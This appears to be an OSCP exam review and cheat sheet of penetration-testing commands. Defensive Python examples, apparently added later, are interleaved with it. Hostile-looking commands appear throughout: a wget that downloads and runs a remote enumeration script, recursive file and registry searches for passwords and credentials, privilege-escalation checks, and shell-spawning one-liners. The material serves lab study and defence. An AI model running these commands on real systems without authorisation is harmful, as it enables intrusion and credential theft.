GitHub Repository: XCHADXFAQ77X/HACKING-BOOKS-X
Path: blob/master/7-part-100-article/OSCP Review-Cheat Sheet.txt
OSCP Review/Cheat Sheet

After 30 days of lab time, 24 boxes, and countless nights of no sleep, I can officially say I passed OSCP. And like every other person who's passed the course, I'm going to do a little write-up, except this time. Before I begin, I'll make it very clear I had previous experience in pen testing and information security. Overall, what makes this course so valuable isn't the exploits themselves, but the technique behind them. Anyone can type "searchsploit ENTER_SOMETHING_HERE" and hope for the best. The hard part is enumerating everything, from dirb to crawling anonymous FTP servers. Cheat sheet time...

Enumeration:

Sparta
Hands down your best friend for the lab and exam. It runs multiple Nmap scans, TCP and UDP, along with the option of using unicornscan. What makes this tool incredibly useful is that you can right-click open ports and see what tools are available to use on them. Plus, who doesn't love a clean GUI?

Nmap:

Set the IP address as a variable, then run a full-port scan with version and OS detection
export ip=192.168.1.100
nmap -A -T4 -p- $ip

Netcat port scanning
nc -nvv -w 1 -z $ip 3388-3390

Discover active IPs using ARP on the network
arp-scan $ip/24

Discover who else is on the network
netdiscover

Discover IP, MAC and MAC vendors from ARP
netdiscover -r $ip/24

Nmap stealth scan using SYN
nmap -sS $ip

Nmap stealth scan using FIN
nmap -sF $ip

Nmap Banner Grabbing
nmap -sV -sT $ip

Nmap OS Fingerprinting
nmap -O $ip

Nmap Regular Scan:
nmap $ip/24

Enumeration Scan
nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt

Enumeration Scan, all ports TCP/UDP, output to a txt file
nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip

Nmap output to a file:
nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24

Quick Scan:
nmap -T4 -F $ip/24

Quick Scan Plus:
nmap -sV -T4 -O -F --version-light $ip/24

Quick traceroute
nmap -sn --traceroute $ip

All TCP and UDP Ports
nmap -v -sU -sS -p- -A -T4 $ip

Intense Scan:
nmap -T4 -A -v $ip

Intense Scan Plus UDP
nmap -sS -sU -T4 -A -v $ip/24

Intense Scan, all TCP ports
nmap -p 1-65535 -T4 -A -v $ip/24

Intense Scan, no ping
nmap -T4 -A -v -Pn $ip/24

Ping scan
nmap -sn $ip/24

Slow Comprehensive Scan
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24

Scan with a full TCP connect (-sT) in order to weed out any spoofed ports designed to troll you
nmap -p1-65535 -A -T5 -sT $ip

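Seen from the defender's side, the SYN, FIN and full-port scans above have a simple shape: one source touching dozens of ports on a host within seconds, or sending FIN-only segments to ports that never saw a SYN (nothing a real client does, since a client's FIN always follows its own SYN). The Python below is an added example written for this review, not code from the original cheat sheet; it runs exactly that logic over constructed log lines in a made-up `<unix_ts> <src_ip> <dst_ip> <dst_port> <tcp_flags>` format. The log format, the addresses and the thresholds are all assumptions for the example, not any real firewall's output.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed, simplified connection-log format (an assumption for this example,
# not any real firewall's output): "<unix_ts> <src_ip> <dst_ip> <dst_port> <tcp_flags>"
LINE_RE = re.compile(
    r"^(?P<ts>\d+) (?P<src>[\d.]+) (?P<dst>[\d.]+) (?P<dport>\d+) (?P<flags>[A-Z]+)$"
)


@dataclass(frozen=True)
class Packet:
    ts: int
    src: str
    dst: str
    dport: int
    flags: str


def parse(lines):
    """Parse log lines into Packet records, silently skipping malformed lines."""
    packets = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            packets.append(Packet(int(m["ts"]), m["src"], m["dst"], int(m["dport"]), m["flags"]))
    return packets


def detect_port_scans(packets, window=10, port_threshold=20):
    """Vertical scan: one source touching >= port_threshold distinct ports on one
    host within `window` seconds. Returns {(src, dst): max_distinct_ports_seen}."""
    by_pair = defaultdict(list)
    for p in packets:
        by_pair[(p.src, p.dst)].append(p)
    findings = {}
    for pair, plist in by_pair.items():
        plist.sort(key=lambda p: p.ts)
        for i, start in enumerate(plist):
            # distinct ports inside the window that opens at this packet
            ports = {q.dport for q in plist[i:] if q.ts - start.ts <= window}
            if len(ports) >= port_threshold:
                findings[pair] = max(findings.get(pair, 0), len(ports))
    return findings


def detect_fin_probes(packets):
    """-sF signature: a FIN-only segment to a (src, dst, port) triple that never
    saw a SYN first. Returns {src: number_of_such_segments}."""
    saw_syn = set()
    suspects = defaultdict(int)
    for p in sorted(packets, key=lambda p: p.ts):
        key = (p.src, p.dst, p.dport)
        if "S" in p.flags:
            saw_syn.add(key)
        elif p.flags == "F" and key not in saw_syn:
            suspects[p.src] += 1
    return dict(suspects)


# Constructed sample: 10.0.0.5 SYN-scans 30 ports in ~3 s, 10.0.0.7 is a normal
# HTTPS client (SYN, ACK, then FIN), 10.0.0.9 sends bare FINs to three ports.
SAMPLE_LOG = [f"{100 + i // 10} 10.0.0.5 10.0.0.20 {port} S" for i, port in enumerate(range(1, 31))]
SAMPLE_LOG += ["100 10.0.0.7 10.0.0.20 443 S", "100 10.0.0.7 10.0.0.20 443 A", "105 10.0.0.7 10.0.0.20 443 F"]
SAMPLE_LOG += [f"120 10.0.0.9 10.0.0.20 {port} F" for port in (22, 80, 445)]


def analyse(lines):
    """Run both detectors over raw log lines and return their findings together."""
    packets = parse(lines)
    return {"port_scans": detect_port_scans(packets), "fin_probes": detect_fin_probes(packets)}


if __name__ == "__main__":
    for kind, hits in analyse(SAMPLE_LOG).items():
        print(kind, hits)
```

On the sample, the SYN scanner is reported with 30 distinct ports, the HTTPS client is not reported at all, and the three bare FINs are attributed to 10.0.0.9. The window and threshold are the knobs to tune against real traffic; a `-T4 -p-` scan like the ones above produces thousands of distinct ports per second and trips any sane threshold, while a slow `-T0`-style scan needs a much longer window.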
SMB

SMB OS Discovery
nmap $ip --script smb-os-discovery.nse

Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254

Netbios Information Scanning
nbtscan -r $ip/24

Nmap find exposed Netbios servers
nmap -sU --script nbstat.nse -p 137 $ip

Nmap all SMB scripts scan

SMB Enumeration Tools

smbclient //MOUNT/share -I $ip -N
rpcclient -U "" $ip
enum4linux $ip
enum4linux -a $ip

SMB Finger Printing
smbclient -L //$ip

Nmap Scan for Open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24

Nmap scans for vulnerable SMB Servers (smb-check-vulns was split into the smb-vuln-* scripts in Nmap 7, so on current versions use --script smb-vuln-* instead)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip

Nmap List all SMB scripts installed
ls -l /usr/share/nmap/scripts/smb*

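The `-oG smb.txt` port scan above writes Nmap's grepable format, one tab-separated `Host:` line per host with a `Ports:` field whose entries read `port/state/proto/owner/service/rpc/version/`. The same scan run from an internal vantage point is how a defender inventories SMB exposure, and the useful next step is diffing the result against the hosts that are supposed to serve files. The parser below is an added example, not part of the cheat sheet; the `.gnmap` text it consumes is constructed here to match the format, and the addresses and hostname are made up.

```python
import re

HOST_RE = re.compile(r"^Host: (\S+) \((.*?)\)")


def parse_grepable(text):
    """Parse nmap -oG output into {ip: {"hostname": str, "ports": {port: {...}}}}.
    Comment lines start with '#'; each Ports: entry is port/state/proto/owner/service/rpc/version/."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        entry = hosts.setdefault(ip, {"hostname": hostname, "ports": {}})
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue  # e.g. "Status: Up" or "Ignored State: ..." fields
            for item in field[len("Ports: "):].split(", "):
                parts = item.split("/")
                if len(parts) < 5:
                    continue
                entry["ports"][int(parts[0])] = {"state": parts[1], "proto": parts[2], "service": parts[4]}
    return hosts


def hosts_with_open(hosts, port):
    """IPs (sorted) on which `port` was reported open."""
    return sorted(ip for ip, h in hosts.items() if h["ports"].get(port, {}).get("state") == "open")


def unexpected_smb_hosts(hosts, approved):
    """Hosts exposing 445 that are not on the approved list of file servers."""
    return [ip for ip in hosts_with_open(hosts, 445) if ip not in approved]


# Constructed sample output in the -oG format (addresses and names are made up).
SAMPLE_GNMAP = """# Nmap 7.91 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -v -p 139,445 -oG smb.txt 192.168.10.1-254
Host: 192.168.10.5 ()\tStatus: Up
Host: 192.168.10.5 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
Host: 192.168.10.7 ()\tStatus: Up
Host: 192.168.10.7 ()\tPorts: 139/closed/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///
Host: 192.168.10.9 (fileserver.lab.local)\tStatus: Up
Host: 192.168.10.9 (fileserver.lab.local)\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (0)
# Nmap done at Mon Jan  1 00:00:05 2024 -- 254 IP addresses (3 hosts up) scanned in 5.00 seconds
"""

if __name__ == "__main__":
    hosts = parse_grepable(SAMPLE_GNMAP)
    print("445 open:", hosts_with_open(hosts, 445))
    print("not approved:", unexpected_smb_hosts(hosts, approved={"192.168.10.9"}))
```

Point it at a real `smb.txt` by reading the file into `parse_grepable`; the `approved` set is the inventory of hosts that are meant to expose SMB, and anything else in the "not approved" list is either an undocumented file server or a workstation with file sharing left on.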
Linux OS Enumeration

List all SUID files
find / -perm -4000 2>/dev/null

Determine the current version of Linux
cat /etc/issue

Determine more information about the environment
uname -a

List processes running
ps -xaf

List the allowed (and forbidden) commands for the invoking user
sudo -l

List iptables rules
iptables --table nat --list
iptables -vL -t filter
iptables -vL -t nat
iptables -vL -t mangle
iptables -vL -t raw
iptables -vL -t security

Windows OS Enumeration

net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

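The two `reg query` lines above look up the AlwaysInstallElevated policy. The weak configuration is the value set to 1 in both hives: Windows Installer only honours the policy when HKLM and HKCU both enable it, so a value of 1 in one hive alone is not the misconfiguration, and a missing key (reg query prints an ERROR line) counts as off. The Python below is an added example, not part of the cheat sheet; it parses the text that `reg query` prints for that value (the sample outputs are constructed to match the format) and reports whether the policy is actually active, which is the check a configuration audit should run before someone else does. The fix is to set both values to 0 or to remove the "Always install with elevated privileges" setting through Group Policy.

```python
import re

# reg query prints the value on a line like: "    AlwaysInstallElevated    REG_DWORD    0x1"
AIE_RE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)", re.IGNORECASE)


def aie_enabled(reg_query_output):
    """True only when this hive's output shows AlwaysInstallElevated == 1.
    A missing key (ERROR line) or a 0 value both mean 'off' for this hive."""
    m = AIE_RE.search(reg_query_output)
    return m is not None and int(m.group(1), 16) == 1


def check_always_install_elevated(hklm_output, hkcu_output):
    """Per-hive state plus the verdict that matters: the policy is active only if both hives enable it."""
    hklm, hkcu = aie_enabled(hklm_output), aie_enabled(hkcu_output)
    return {"HKLM": hklm, "HKCU": hkcu, "policy_active": hklm and hkcu}


# Constructed sample outputs in the format reg query uses (not captured from a real host).
HKLM_SET = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
HKCU_SET = (
    "\r\nHKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
HKCU_OFF = (
    "\r\nHKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x0\r\n\r\n"
)
KEY_MISSING = "\r\nERROR: The system was unable to find the specified registry key or value.\r\n"

if __name__ == "__main__":
    print("both set:", check_always_install_elevated(HKLM_SET, HKCU_SET))
    print("HKCU off:", check_always_install_elevated(HKLM_SET, HKCU_OFF))
    print("HKLM key missing:", check_always_install_elevated(KEY_MISSING, HKCU_SET))
```

Feed it the captured output of the two `reg query` commands (for example via `subprocess.run([...], capture_output=True, text=True).stdout` on the host being audited); only the `policy_active` verdict should raise a finding, the per-hive flags are there to show which side needs cleaning up.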
File Enumeration

Find setuid/setgid files (a root-owned setuid binary executes as UID 0); the two permission tests are grouped so that the symlink filter and -exec apply to both
/usr/bin/find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

Get handy linux file system enumeration script (/var/tmp)
wget https://highon.coffee/downloads/linux-local-enum.sh
chmod +x ./linux-local-enum.sh
./linux-local-enum.sh

Find executable files updated in August
find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug

Find a specific file on linux
find /. -name suid\*

Find all the strings in a file
strings <filename>

Determine the type of a file
file <filename>

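Both the "List all SUID files" one-liner in the Linux section and the setuid/setgid find above answer the same question, and on the defending side the useful form of that question is "which setuid binaries are here that were not here at install time?". The Python below is an added example, not from the cheat sheet: it walks a tree the way the find commands do (no symlink following, unreadable entries skipped), collects files with the setuid or setgid bit, and diffs them against a baseline. The `demo()` function builds a constructed tree in a temporary directory with made-up file names (`passwd`, `ls`, `unknown-tool`) so the whole thing runs offline; on a real host you would call `find_setuid("/")` and keep the baseline from a known-good image.

```python
import os
import stat
import tempfile


def find_setuid(root):
    """Return {path: permission_bits} for regular files under `root` with the setuid
    or setgid bit set, the same population `find / -perm -4000` / `-perm -g=s` reports."""
    found = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks, like find's ! -type l
            except OSError:
                continue  # unreadable entry; the one-liners hide these with 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found[path] = stat.S_IMODE(st.st_mode)
    return found


def diff_against_baseline(found, baseline):
    """(unexpected, missing): setuid files the baseline never listed, and baseline
    entries whose bit is no longer set (also worth a look: someone may have replaced them)."""
    unexpected = sorted(set(found) - set(baseline))
    missing = sorted(set(baseline) - set(found))
    return unexpected, missing


def demo():
    """Audit a constructed tree (sample data, not a real system) and return relative paths."""
    with tempfile.TemporaryDirectory() as base:
        bindir = os.path.join(base, "usr", "bin")
        os.makedirs(bindir)
        # passwd: expected setuid; ls: plain executable; unknown-tool: setuid nobody documented
        for name, mode in (("passwd", 0o4755), ("ls", 0o755), ("unknown-tool", 0o4755)):
            path = os.path.join(bindir, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)  # chmod after close, since writing would clear a setuid bit
        found = find_setuid(base)
        baseline = {os.path.join(bindir, "passwd")}
        unexpected, missing = diff_against_baseline(found, baseline)
        rel = lambda p: os.path.relpath(p, base)
        return {
            "modes": {rel(p): m for p, m in found.items()},
            "unexpected": [rel(p) for p in unexpected],
            "missing": [rel(p) for p in missing],
        }


if __name__ == "__main__":
    result = demo()
    for key, value in result.items():
        print(key, value)
```

The `modes` entry keeps the permission bits (0o4755 for the two setuid files in the sample) so a report can distinguish setuid from setgid; `unexpected` is the list to investigate, `missing` the list that hints at a replaced or re-permissioned system binary.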
Spawning Shells:

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
From within IRB: exec "/bin/sh"
From within vi: :!bash or
:set shell=/bin/bash:shell
From within vim: :!bash
From within nmap: !sh